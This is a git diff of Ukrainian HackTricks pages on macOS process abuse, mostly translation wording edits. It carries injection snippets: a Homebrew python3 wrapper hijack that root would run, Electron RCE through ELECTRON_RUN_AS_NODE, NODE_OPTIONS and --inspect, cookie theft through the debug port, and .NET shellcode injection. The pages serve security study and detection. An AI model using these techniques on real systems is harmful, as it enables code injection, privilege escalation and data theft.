- `POSUX_SPAWN_SETSIGDEF`: Встановити поведінку за замовчуванням сигналів
- `POSIX_SPAWN_SETSIGMASK`: Встановити маску сигналів
- `POSUX_SPAWN_SETSIGDEF`: Встановити поведінку за замовчуванням сигналу
- `POSIX_SPAWN_SETSIGMASK`: Встановити маску сигналу
- `POSIX_SPAWN_SETEXEC`: Виконати в тому ж процесі (як `execve` з більшою кількістю опцій)
- `POSIX_SPAWN_START_SUSPENDED`: Запустити в підвішеному стані
- `_POSIX_SPAWN_DISABLE_ASLR`: Запустити без ASLR
@ -61,12 +61,12 @@ char persona_name[MAXLOGNAME + 1];
1. **POSIX потоки (pthreads):** macOS підтримує POSIX потоки (`pthreads`), які є частиною стандартного API потоків для C/C++. Реалізація pthreads в macOS знаходиться в `/usr/lib/system/libsystem_pthread.dylib`, яка походить з публічно доступного проекту `libpthread`. Ця бібліотека надає необхідні функції для створення та управління потоками.
2. **Створення потоків:** Функція `pthread_create()` використовується для створення нових потоків. Внутрішньо ця функція викликає `bsdthread_create()`, яка є системним викликом нижчого рівня, специфічним для ядра XNU (ядро, на якому базується macOS). Цей системний виклик приймає різні прапори, отримані з `pthread_attr` (атрибути), які вказують на поведінку потоку, включаючи політики планування та розмір стеку.
- **Розмір стеку за замовчуванням:** Розмір стеку за замовчуванням для нових потоків становить 512 КБ, що є достатнім для типових операцій, але може бути відкориговано через атрибути потоку, якщо потрібно більше або менше місця.
3. **Ініціалізація потоків:** Функція `__pthread_init()` є критично важливою під час налаштування потоків, використовуючи аргумент `env[]` для парсингу змінних середовища, які можуть містити деталі про місцезнаходження та розмір стеку.
3. **Ініціалізація потоку:** Функція `__pthread_init()` є критично важливою під час налаштування потоку, використовуючи аргумент `env[]` для парсингу змінних середовища, які можуть містити деталі про місцезнаходження та розмір стеку.
#### Завершення потоків в macOS
1. **Вихід з потоків:** Потоки зазвичай завершуються викликом `pthread_exit()`. Ця функція дозволяє потоку вийти коректно, виконуючи необхідні дії з очищення та дозволяючи потоку надіслати значення повернення назад до будь-яких приєднувачів.
2. **Очищення потоків:** Після виклику `pthread_exit()` викликається функція `pthread_terminate()`, яка обробляє видалення всіх асоційованих структур потоків. Вона звільняє порти потоків Mach (Mach є підсистемою зв'язку в ядрі XNU) і викликає `bsdthread_terminate`, системний виклик, який видаляє структури на рівні ядра, пов'язані з потоком.
2. **Очищення потоків:** Після виклику `pthread_exit()` викликається функція `pthread_terminate()`, яка обробляє видалення всіх асоційованих структур потоку. Вона звільняє порти потоків Mach (Mach є підсистемою зв'язку в ядрі XNU) і викликає `bsdthread_terminate`, системний виклик, який видаляє структури на рівні ядра, пов'язані з потоком.
#### Механізми синхронізації
@ -74,7 +74,7 @@ char persona_name[MAXLOGNAME + 1];
1. **М'ютекси:**
- **Звичайний м'ютекс (Signature: 0x4D555458):** Стандартний м'ютекс з обсягом пам'яті 60 байт (56 байт для м'ютекса та 4 байти для підпису).
- **Швидкий м'ютекс (Signature: 0x4d55545A):** Схожий на звичайний м'ютекс, але оптимізований для швидших операцій, також 60 байт розміру.
- **Швидкий м'ютекс (Signature: 0x4d55545A):** Схожий на звичайний м'ютекс, але оптимізований для швидших операцій, також 60 байт в розмірі.
2. **Змінні умов:**
- Використовуються для очікування настання певних умов, з розміром 44 байти (40 байт плюс 4-байтовий підпис).
- **Атрибути змінних умов (Signature: 0x434e4441):** Атрибути конфігурації для змінних умов, розміром 12 байт.
@ -83,14 +83,14 @@ char persona_name[MAXLOGNAME + 1];
4. **Замки читання-запису:**
- Дозволяють одночасно кільком читачам або одному записувачу, сприяючи ефективному доступу до спільних даних.
- **Замок читання-запису (Signature: 0x52574c4b):** Розміром 196 байт.
- **Атрибути замка читання-запису (Signature: 0x52574c41):** Атрибути для замків читання-запису, 20 байт розміру.
- **Атрибути замків читання-запису (Signature: 0x52574c41):** Атрибути для замків читання-запису, 20 байт в розмірі.
> [!TIP]
> Останні 4 байти цих об'єктів використовуються для виявлення переповнень.
### Локальні змінні потоків (TLV)
### Локальні змінні потоку (TLV)
**Локальні змінні потоків (TLV)** в контексті файлів Mach-O (формат для виконуваних файлів в macOS) використовуються для оголошення змінних, які є специфічними для **кожного потоку** в багатопоточному додатку. Це забезпечує, що кожен потік має свій власний окремий екземпляр змінної, що дозволяє уникати конфліктів і підтримувати цілісність даних без необхідності в явних механізмах синхронізації, таких як м'ютекси.
**Локальні змінні потоку (TLV)** в контексті файлів Mach-O (формат для виконуваних файлів в macOS) використовуються для оголошення змінних, які є специфічними для **кожного потоку** в багатопоточному додатку. Це забезпечує, що кожен потік має свій власний окремий екземпляр змінної, що дозволяє уникати конфліктів і підтримувати цілісність даних без необхідності в явних механізмах синхронізації, таких як м'ютекси.
У C та суміжних мовах ви можете оголосити локальну змінну потоку, використовуючи ключове слово **`__thread`**. Ось як це працює у вашому прикладі:
```c
@ -107,13 +107,13 @@ tlv_var = 10;
- **`__DATA.__thread_vars`**: Ця секція містить метадані про локальні для потоку змінні, такі як їх типи та статус ініціалізації.
- **`__DATA.__thread_bss`**: Ця секція використовується для локальних для потоку змінних, які не ініціалізовані явно. Це частина пам'яті, відведена для даних, ініціалізованих нулем.
Mach-O також надає специфічний API під назвою **`tlv_atexit`** для управління локальними для потоку змінними, коли потік завершується. Цей API дозволяє **реєструвати деструктори** — спеціальні функції, які очищають локальні для потоку дані, коли потік завершується.
Mach-O також надає специфічний API під назвою **`tlv_atexit`** для управління локальними для потоку змінними, коли потік завершує свою роботу. Цей API дозволяє **реєструвати деструктори** — спеціальні функції, які очищають локальні для потоку дані, коли потік завершується.
### Пріоритети потоків
Розуміння пріоритетів потоків передбачає вивчення того, як операційна система вирішує, які потоки виконувати і коли. Це рішення впливає на рівень пріоритету, призначений кожному потоку. У macOS та Unix-подібних системах це обробляється за допомогою концепцій, таких як `nice`, `renice` та класи якості обслуговування (QoS).
#### Nice та Renice
#### Nice і Renice
1. **Nice:**
- Значення `nice` процесу — це число, яке впливає на його пріоритет. Кожен процес має значення nice в діапазоні від -20 (найвищий пріоритет) до 19 (найнижчий пріоритет). Значення nice за замовчуванням, коли процес створюється, зазвичай становить 0.
@ -127,12 +127,12 @@ Mach-O також надає специфічний API під назвою **`t
Класи QoS є більш сучасним підходом до управління пріоритетами потоків, особливо в системах, таких як macOS, які підтримують **Grand Central Dispatch (GCD)**. Класи QoS дозволяють розробникам **категоризувати** роботу на різні рівні залежно від їх важливості або терміновості. macOS автоматично управляє пріоритизацією потоків на основі цих класів QoS:
1. **Користувацький інтерактивний:**
- Цей клас призначений для завдань, які в даний час взаємодіють з користувачем або вимагають негайних результатів для забезпечення хорошого користувацького досвіду. Ці завдання отримують найвищий пріоритет, щоб інтерфейс залишався чутливим (наприклад, анімації або обробка подій).
- Цей клас призначений для завдань, які в даний момент взаємодіють з користувачем або вимагають негайних результатів для забезпечення хорошого користувацького досвіду. Ці завдання отримують найвищий пріоритет, щоб інтерфейс залишався чутливим (наприклад, анімації або обробка подій).
2. **Ініційований користувачем:**
- Завдання, які ініціює користувач і очікує негайних результатів, такі як відкриття документа або натискання кнопки, що вимагає обчислень. Це високий пріоритет, але нижче, ніж користувацький інтерактивний.
3. **Утиліта:**
- Ці завдання є тривалими і зазвичай показують індикатор прогресу (наприклад, завантаження файлів, імпорт даних). Вони мають нижчий пріоритет, ніж ініційовані користувачем завдання, і не потребують негайного завершення.
4. **Фоновий:**
4. **Фонові:**
- Цей клас призначений для завдань, які працюють у фоновому режимі і не видимі для користувача. Це можуть бути завдання, такі як індексація, синхронізація або резервне копіювання. Вони мають найнижчий пріоритет і мінімальний вплив на продуктивність системи.
Використовуючи класи QoS, розробники не повинні управляти точними номерами пріоритету, а скоріше зосереджуватися на природі завдання, а система оптимізує ресурси ЦП відповідно.
@ -177,7 +177,7 @@ macos-electron-applications-injection.md
### Ін'єкція Chromium
Можна використовувати параметри `--load-extension` та `--use-fake-ui-for-media-stream` для виконання **атаки "людина в браузері"**, що дозволяє красти натискання клавіш, трафік, куки, ін'єктувати скрипти на сторінках...:
Можна використовувати параметри `--load-extension` та `--use-fake-ui-for-media-stream`, щоб виконати **атаку "людина в браузері"**, що дозволяє красти натискання клавіш, трафік, куки, ін'єктувати скрипти на сторінках...:
{{#ref}}
macos-chromium-injection.md
@ -185,7 +185,7 @@ macos-chromium-injection.md
### Брудний NIB
Файли NIB **визначають елементи інтерфейсу користувача (UI)** та їх взаємодії в додатку. Однак вони можуть **виконувати довільні команди**, і **Gatekeeper не зупиняє** вже виконуваний додаток від повторного виконання, якщо **файл NIB модифіковано**. Тому їх можна використовувати для виконання довільних команд:
Файли NIB **визначають елементи інтерфейсу користувача (UI)** та їх взаємодії в межах програми. Однак вони можуть **виконувати довільні команди**, і **Gatekeeper не зупиняє** вже виконувану програму від виконання, якщо **файл NIB модифіковано**. Тому їх можна використовувати для виконання довільних команд:
{{#ref}}
macos-dirty-nib.md
@ -226,27 +226,27 @@ macos-ruby-applications-injection.md
### Ін'єкція Python
Якщо змінна середовища **`PYTHONINSPECT`** встановлена, процес Python перейде в CLI Python після завершення. Також можливо використовувати **`PYTHONSTARTUP`**, щоб вказати скрипт Python для виконання на початку інтерактивної сесії.\
Однак зверніть увагу, що скрипт **`PYTHONSTARTUP`** не буде виконаний, коли **`PYTHONINSPECT`** створює інтерактивну сесію.
Однак зверніть увагу, що скрипт **`PYTHONSTARTUP`** не буде виконано, коли **`PYTHONINSPECT`** створює інтерактивну сесію.
Інші змінні середовища, такі як **`PYTHONPATH`** та **`PYTHONHOME`**, також можуть бути корисними для виконання довільного коду командою Python.
Інші змінні середовища, такі як **`PYTHONPATH`** та **`PYTHONHOME`**, також можуть бути корисними для виконання довільного коду Python.
Зверніть увагу, що виконувані файли, скомпільовані за допомогою **`pyinstaller`**, не використовуватимуть ці змінні середовища, навіть якщо вони виконуються за допомогою вбудованого Python.
> [!CAUTION]
> Загалом, я не зміг знайти спосіб змусити Python виконувати довільний код, зловживаючи змінними середовища.\
> Однак більшість людей встановлюють Python за допомогою **Homebrew**, що встановлює Python у **записуване місце** для користувача за замовчуванням. Ви можете перехопити його чимось на зразок:
> Однак більшість людей встановлюють Python за допомогою **Homebrew**, що встановлює Python у **записуване місце** для користувача за замовчуванням. Ви можете захопити його чимось на зразок:
>
> ```bash
> mv /opt/homebrew/bin/python3 /opt/homebrew/bin/python3.old
> cat > /opt/homebrew/bin/python3 <<EOF
> #!/bin/bash
> # Додатковий код перехоплення
> # Додатковий код захоплення
> /opt/homebrew/bin/python3.old "$@"
> EOF
> chmod +x /opt/homebrew/bin/python3
> ```
>
> Навіть **root** виконає цей код, коли запуститься Python.
> Навіть **root** виконає цей код, коли запустить Python.
## Виявлення
@ -254,7 +254,7 @@ macos-ruby-applications-injection.md
[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) — це відкритий додаток, який може **виявляти та блокувати дії ін'єкції процесів**:
- Використовуючи **змінні середовища**: Він буде контролювати наявність будь-якої з наступних змінних середовища: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** та **`ELECTRON_RUN_AS_NODE`**
- Використовуючи **змінні середовища**: Він буде контролювати наявність будь-якої з наступних змінних середовища: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** та **`ELECTRON_RUN_AS_NODE`**.
- Використовуючи виклики **`task_for_pid`**: Щоб дізнатися, коли один процес хоче отримати **порт завдання іншого**, що дозволяє ін'єктувати код у процес.
- **Параметри додатків Electron**: Хтось може використовувати аргументи командного рядка **`--inspect`**, **`--inspect-brk`** та **`--remote-debugging-port`**, щоб запустити додаток Electron у режимі налагодження, і таким чином ін'єктувати код у нього.
- Використовуючи **символьні посилання** або **жорсткі посилання**: Зазвичай найпоширеніше зловживання полягає в **розміщенні посилання з нашими привілеями** та **вказуванні на місце з вищими привілеями**. Виявлення дуже просте для обох жорстких і символьних посилань. Якщо процес, що створює посилання, має **інший рівень привілеїв**, ніж цільовий файл, ми створюємо **попередження**. На жаль, у випадку символьних посилань блокування неможливе, оскільки у нас немає інформації про призначення посилання до його створення. Це обмеження фреймворку EndpointSecurity Apple.

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
View File

@ -2,7 +2,7 @@
{{#include ../../../banners/hacktricks-training.md}}
**Це резюме посту [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/). Перевірте його для отримання додаткових деталей!**
**Це резюме поста [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/). Перевірте його для отримання додаткових деталей!**
## .NET Core Debugging <a href="#net-core-debugging" id="net-core-debugging"></a>
@ -54,7 +54,7 @@ read(rd, &sReceiveHeader, sizeof(MessageHeader));
```
## Читання пам'яті
Once a debugging session is established, memory can be read using the [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896) message type. The function readMemory is detailed, performing the necessary steps to send a read request and retrieve the response:
Як тільки сесія налагодження встановлена, пам'ять можна читати за допомогою типу повідомлення [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896). Функція readMemory детально описує необхідні кроки для відправки запиту на читання та отримання відповіді:
```c
bool readMemory(void *addr, int len, unsigned char **output) {
// Allocation and initialization
@ -68,9 +68,9 @@ return true;
```
Повний доказ концепції (POC) доступний [тут](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
## Запис пам'яті
## Запис у пам'ять
Аналогічно, пам'ять можна записувати за допомогою функції `writeMemory`. Процес включає встановлення типу повідомлення на `MT_WriteMemory`, вказівку адреси та довжини даних, а потім відправку даних:
Аналогічно, пам'ять можна записати за допомогою функції `writeMemory`. Процес включає встановлення типу повідомлення на `MT_WriteMemory`, вказівку адреси та довжини даних, а потім відправку даних:
```c
bool writeMemory(void *addr, int len, unsigned char *input) {
// Increment IDs, set message type, and specify memory location
@ -84,7 +84,7 @@ return true;
```
Пов'язаний POC доступний [тут](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).
## .NET Core Code Execution <a href="#net-core-code-execution" id="net-core-code-execution"></a>
## .NET Core Виконання Коду <a href="#net-core-code-execution" id="net-core-code-execution"></a>
Щоб виконати код, потрібно визначити область пам'яті з правами rwx, що можна зробити за допомогою vmmap -pages:
```bash
@ -93,13 +93,13 @@ vmmap -pages 35829 | grep "rwx/rwx"
```
Знаходження місця для перезапису вказівника функції є необхідним, і в .NET Core це можна зробити, націлившись на **Dynamic Function Table (DFT)**. Ця таблиця, детально описана в [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h), використовується середовищем виконання для допоміжних функцій JIT-компіляції.
Для систем x64 можна використовувати підхід підбору підписів для знаходження посилання на символ `_hlpDynamicFuncTable` у `libcorclr.dll`.
Для систем x64 можна використовувати підхід підбору сигнатур для знаходження посилання на символ `_hlpDynamicFuncTable` у `libcorclr.dll`.
Функція налагодження `MT_GetDCB` надає корисну інформацію, включаючи адресу допоміжної функції `m_helperRemoteStartAddr`, що вказує на місцезнаходження `libcorclr.dll` у пам'яті процесу. Ця адреса потім використовується для початку пошуку DFT і перезапису вказівника функції адресою shellcode.
Повний код POC для ін'єкції в PowerShell доступний [тут](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).
## Посилання
## References
- [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/)

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
View File

@ -8,7 +8,7 @@
Nib (скорочено від NeXT Interface Builder) файли, частина екосистеми розробки Apple, призначені для визначення **UI елементів** та їх взаємодій в додатках. Вони містять серіалізовані об'єкти, такі як вікна та кнопки, і завантажуються під час виконання. Незважаючи на їхнє постійне використання, Apple тепер рекомендує Storyboards для більш комплексної візуалізації потоку UI.
Основний Nib файл згадується у значенні **`NSMainNibFile`** всередині файлу `Info.plist` додатка і завантажується функцією **`NSApplicationMain`**, яка виконується в функції `main` додатка.
Основний Nib файл згадується в значенні **`NSMainNibFile`** всередині файлу `Info.plist` додатку і завантажується функцією **`NSApplicationMain`**, яка виконується в функції `main` додатку.
### Процес ін'єкції Dirty Nib
@ -35,7 +35,7 @@ display dialog theDialogText
#### Цілеве застосування (Приклад: Pages)
1. **Підготовка**:
- Скопіюйте цільовий додаток (наприклад, Pages) у окрему директорію (наприклад, `/tmp/`).
- Скопіюйте цільовий додаток (наприклад, Pages) в окрему директорію (наприклад, `/tmp/`).
- Запустіть додаток, щоб обійти проблеми з Gatekeeper і кешувати його.
2. **Перезапис NIB файлу**:
- Замініть існуючий NIB файл (наприклад, NIB файлу панелі "Про програму") на створений DirtyNIB файл.
@ -63,11 +63,11 @@ display dialog theDialogText
З macOS Sonoma обмежено модифікації всередині пакетів додатків. Однак раніше методи включали:
1. Копіювання додатка в інше місце (наприклад, `/tmp/`).
2. Перейменування директорій у пакеті додатка, щоб обійти початкові захисти.
3. Після запуску додатка для реєстрації з Gatekeeper, модифікація пакету додатка (наприклад, заміна MainMenu.nib на Dirty.nib).
4. Повернення директорій назад і повторний запуск додатка для виконання ін'єкованого NIB файлу.
1. Копіювання додатку в інше місце (наприклад, `/tmp/`).
2. Перейменування директорій всередині пакету додатку, щоб обійти початкові захисти.
3. Після запуску додатку для реєстрації з Gatekeeper, модифікація пакету додатку (наприклад, заміна MainMenu.nib на Dirty.nib).
4. Повернення директорій назад і повторний запуск додатку для виконання ін'єкованого NIB файлу.
**Примітка**: Останні оновлення macOS зменшили цю вразливість, заборонивши модифікацію файлів у пакетах додатків після кешування Gatekeeper, що робить цю вразливість неефективною.
**Примітка**: Останні оновлення macOS зменшили цей експлойт, заборонивши модифікації файлів всередині пакетів додатків після кешування Gatekeeper, що робить експлойт неефективним.
{{#include ../../../banners/hacktricks-training.md}}

20
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
View File

@ -14,12 +14,12 @@
- **`RunAsNode`**: Якщо вимкнено, заважає використанню змінної середовища **`ELECTRON_RUN_AS_NODE`** для ін'єкції коду.
- **`EnableNodeCliInspectArguments`**: Якщо вимкнено, параметри, такі як `--inspect`, `--inspect-brk`, не будуть враховані. Уникаючи таким чином ін'єкції коду.
- **`EnableEmbeddedAsarIntegrityValidation`**: Якщо увімкнено, завантажений **`asar`** **файл** буде **перевірений** macOS. **Запобігаючи** таким чином **ін'єкції коду** шляхом модифікації вмісту цього файлу.
- **`OnlyLoadAppFromAsar`**: Якщо це увімкнено, замість того, щоб шукати завантаження в наступному порядку: **`app.asar`**, **`app`** і нарешті **`default_app.asar`**. Він перевірятиме та використовуватиме лише app.asar, таким чином забезпечуючи, що при **поєднанні** з параметром **`embeddedAsarIntegrityValidation`** неможливо **завантажити неперевірений код**.
- **`OnlyLoadAppFromAsar`**: Якщо це увімкнено, замість пошуку завантаження в наступному порядку: **`app.asar`**, **`app`** і нарешті **`default_app.asar`**. Він перевірятиме та використовуватиме лише app.asar, таким чином забезпечуючи, що при **поєднанні** з параметром **`embeddedAsarIntegrityValidation`** неможливо **завантажити неперевірений код**.
- **`LoadBrowserProcessSpecificV8Snapshot`**: Якщо увімкнено, процес браузера використовує файл під назвою `browser_v8_context_snapshot.bin` для свого V8 знімка.
Ще один цікавий параметр, який не запобігатиме ін'єкції коду:
- **EnableCookieEncryption**: Якщо увімкнено, сховище куків на диску шифрується за допомогою криптографічних ключів на рівні ОС.
- **EnableCookieEncryption**: Якщо увімкнено, сховище куків на диску шифрується за допомогою криптографічних ключів рівня ОС.
### Checking Electron Fuses
@ -46,7 +46,7 @@ LoadBrowserProcessSpecificV8Snapshot is Disabled
grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches
```
Ви можете завантажити цей файл на [https://hexed.it/](https://hexed.it/) і шукати попередній рядок. Після цього рядка ви можете побачити в ASCII число "0" або "1", що вказує, чи кожен запобіжник вимкнений чи увімкнений. Просто змініть шістнадцятковий код (`0x30` - це `0`, а `0x31` - це `1`), щоб **змінити значення запобіжників**.
Ви можете завантажити цей файл на [https://hexed.it/](https://hexed.it/) і шукати попередній рядок. Після цього рядка ви можете побачити в ASCII число "0" або "1", що вказує, чи кожен запобіжник вимкнений або увімкнений. Просто змініть шістнадцятковий код (`0x30` - це `0`, а `0x31` - це `1`), щоб **змінити значення запобіжників**.
<figure><img src="../../../images/image (34).png" alt=""><figcaption></figcaption></figure>
@ -76,7 +76,7 @@ npx asar pack app-decomp app-new.asar
```
## RCE з `ELECTRON_RUN_AS_NODE` <a href="#electron_run_as_node" id="electron_run_as_node"></a>
Згідно з [**документацією**](https://www.electronjs.org/docs/latest/api/environment-variables#electron_run_as_node), якщо ця змінна середовища встановлена, процес буде запущено як звичайний процес Node.js.
Згідно з [**документацією**](https://www.electronjs.org/docs/latest/api/environment-variables#electron_run_as_node), якщо ця змінна середовища встановлена, вона запустить процес як звичайний процес Node.js.
```bash
# Run this
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
@ -147,7 +147,7 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di
```
## RCE з інспекцією
Згідно з [**цією**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), якщо ви виконаєте додаток Electron з такими прапорами, як **`--inspect`**, **`--inspect-brk`** та **`--remote-debugging-port`**, **порт налагодження буде відкритий**, тому ви зможете підключитися до нього (наприклад, з Chrome у `chrome://inspect`) і ви зможете **впровадити код у нього** або навіть запустити нові процеси.\
Згідно з [**цією**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f) інформацією, якщо ви виконаєте додаток Electron з такими прапорами, як **`--inspect`**, **`--inspect-brk`** та **`--remote-debugging-port`**, **порт налагодження буде відкритий**, тому ви зможете підключитися до нього (наприклад, з Chrome у `chrome://inspect`) і ви зможете **впроваджувати код у нього** або навіть запускати нові процеси.\
Наприклад:
```bash
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
@ -157,11 +157,11 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
> [!CAUTION]
> Якщо запобіжник **`EnableNodeCliInspectArguments`** вимкнено, додаток **ігноруватиме параметри node** (такі як `--inspect`) під час запуску, якщо змінна середовища **`ELECTRON_RUN_AS_NODE`** не встановлена, яка також буде **ігноруватися**, якщо запобіжник **`RunAsNode`** вимкнено.
>
> Однак ви все ще можете використовувати **електронний параметр `--remote-debugging-port=9229`**, але попередній payload не спрацює для виконання інших процесів.
> Однак ви все ще можете використовувати **електронний параметр `--remote-debugging-port=9229`**, але попереднє навантаження не спрацює для виконання інших процесів.
Використовуючи параметр **`--remote-debugging-port=9222`**, можна вкрасти деяку інформацію з Electron App, таку як **історія** (з командами GET) або **куки** браузера (оскільки вони **дешифруються** всередині браузера і є **json endpoint**, який їх надасть).
Використовуючи параметр **`--remote-debugging-port=9222`**, можна вкрасти деяку інформацію з Electron App, таку як **історія** (з командами GET) або **куки** браузера (оскільки вони **дешифруються** всередині браузера і є **json-інтерфейс**, який їх надає).
Ви можете дізнатися, як це зробити [**тут**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) і [**тут**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) та використовувати автоматичний інструмент [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) або простий скрипт, як:
Ви можете дізнатися, як це зробити [**тут**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) і [**тут**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) і використовувати автоматичний інструмент [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) або простий скрипт, як:
```python
import websocket
ws = websocket.WebSocket()
@ -187,14 +187,14 @@ print(ws.recv()
<true/>
</dict>
```
## TCC Bypass зловживаючи старими версіями
## TCC Bypass зловживанням старими версіями
> [!TIP]
> Демон TCC з macOS не перевіряє виконувану версію програми. Тому, якщо ви **не можете інжектувати код в Electron додаток** за допомогою будь-якої з попередніх технік, ви можете завантажити попередню версію APP і інжектувати код в неї, оскільки вона все ще отримає привілеї TCC (якщо тільки Trust Cache не завадить цьому).
## Запуск не JS коду
Попередні техніки дозволять вам запускати **JS код всередині процесу електронного додатку**. Однак пам'ятайте, що **дочірні процеси працюють під тим же профілем пісочниці**, що й батьківський додаток, і **успадковують їхні TCC дозволи**.\
Попередні техніки дозволять вам запускати **JS код всередині процесу електронного додатку**. Однак пам'ятайте, що **дочірні процеси працюють під тим же профілем пісочниці**, що й батьківський додаток і **успадковують їх TCC дозволи**.\
Отже, якщо ви хочете зловживати правами доступу до камери або мікрофона, наприклад, ви можете просто **запустити інший бінар з процесу**.
## Автоматичне інжектування

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md
View File

@ -101,7 +101,7 @@ const struct dyld_interpose_tuple array[], size_t count);
Потрібні **об'єкт**, **метод** та **параметри**. І коли метод викликається, **msg надсилається** за допомогою функції **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);`
Об'єкт - це **`someObject`**, метод - це **`@selector(method1p1:p2:)`**, а аргументи - це **value1**, **value2**.
Об'єкт - це **`someObject`**, метод - це **`@selector(method1p1:p2:)`**, а аргументи - **value1**, **value2**.
Слідуючи структурам об'єктів, можна отримати **масив методів**, де **імена** та **вказівники** на код методу **знаходяться**.
@ -230,11 +230,11 @@ return 0;
>
> Наступна техніка не має цього обмеження.
### Метод свізлінгу з method_setImplementation
### Свізлінг методів з method_setImplementation
Попередній формат дивний, оскільки ви змінюєте реалізацію 2 методів один з одного. Використовуючи функцію **`method_setImplementation`**, ви можете **змінити** **реалізацію** **методу на інший**.
Просто пам'ятайте, щоб **зберегти адресу реалізації оригінального** методу, якщо ви плануєте викликати його з нової реалізації перед перезаписуванням, оскільки пізніше буде набагато складніше знайти цю адресу.
Просто пам'ятайте, щоб **зберегти адресу реалізації оригінального** методу, якщо ви плануєте викликати його з нової реалізації перед перезаписом, оскільки пізніше буде значно складніше знайти цю адресу.
```objectivec
#import <Foundation/Foundation.h>
#import <objc/runtime.h>

72
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
View File

@ -22,7 +22,7 @@ Mach використовує **задачі** як **найменшу один
- **Право отримання**, яке дозволяє отримувати повідомлення, надіслані до порту. Mach порти є MPSC (багато-виробник, один-споживач) чергами, що означає, що може бути лише **одне право отримання для кожного порту** в усій системі (на відміну від труб, де кілька процесів можуть утримувати дескриптори файлів для читання з однієї труби).
- **Задача з правом отримання** може отримувати повідомлення та **створювати права відправки**, що дозволяє їй надсилати повідомлення. Спочатку лише **власна задача має право отримання над своїм портом**.
- Якщо власник права отримання **гине** або його вбиває, **право відправки стає марним (мертве ім'я).**
- Якщо власник права отримання **гине** або його вбиває, **право відправки стає марним (мертве ім'я)**.
- **Право відправки**, яке дозволяє надсилати повідомлення до порту.
- Право відправки може бути **клоновано**, тому задача, що володіє правом відправки, може клонувати право та **надати його третій задачі**.
- Зверніть увагу, що **права портів** також можуть бути **передані** через Mac повідомлення.
@ -31,39 +31,39 @@ Mach використовує **задачі** як **найменшу один
- **Право набору портів**, яке позначає абір портів_, а не один порт. Витягування повідомлення з набору портів витягує повідомлення з одного з портів, які він містить. Набори портів можуть використовуватися для прослуховування кількох портів одночасно, подібно до `select`/`poll`/`epoll`/`kqueue` в Unix.
- **Мертве ім'я**, яке не є фактичним правом порту, а лише заповнювачем. Коли порт знищується, всі існуючі права портів на порт перетворюються на мертві імена.
**Задачі можуть передавати права ВІДПРАВКИ іншим**, дозволяючи їм надсилати повідомлення назад. **Права ВІДПРАВКИ також можуть бути клоновані, тому задача може дублювати і надавати право третій задачі**. Це, в поєднанні з проміжним процесом, відомим як **bootstrap server**, дозволяє ефективну комунікацію між задачами.
**Задачі можуть передавати ПРАВА ВІДПРАВКИ іншим**, дозволяючи їм надсилати повідомлення назад. **ПРАВА ВІДПРАВКИ також можуть бути клоновані, тому задача може дублювати і надати право третій задачі**. Це, в поєднанні з проміжним процесом, відомим як **bootstrap server**, дозволяє ефективну комунікацію між задачами.
### Файлові порти
Файлові порти дозволяють інкапсулювати дескриптори файлів у Mac портах (використовуючи права портів Mach). Можна створити `fileport` з даного FD, використовуючи `fileport_makeport`, і створити FD з файлового порту, використовуючи `fileport_makefd`.
Файлові порти дозволяють інкапсулювати дескриптори файлів у Mach портах (використовуючи права Mach порту). Можна створити `fileport` з даного FD, використовуючи `fileport_makeport`, і створити FD з файлового порту, використовуючи `fileport_makefd`.
### Встановлення комунікації
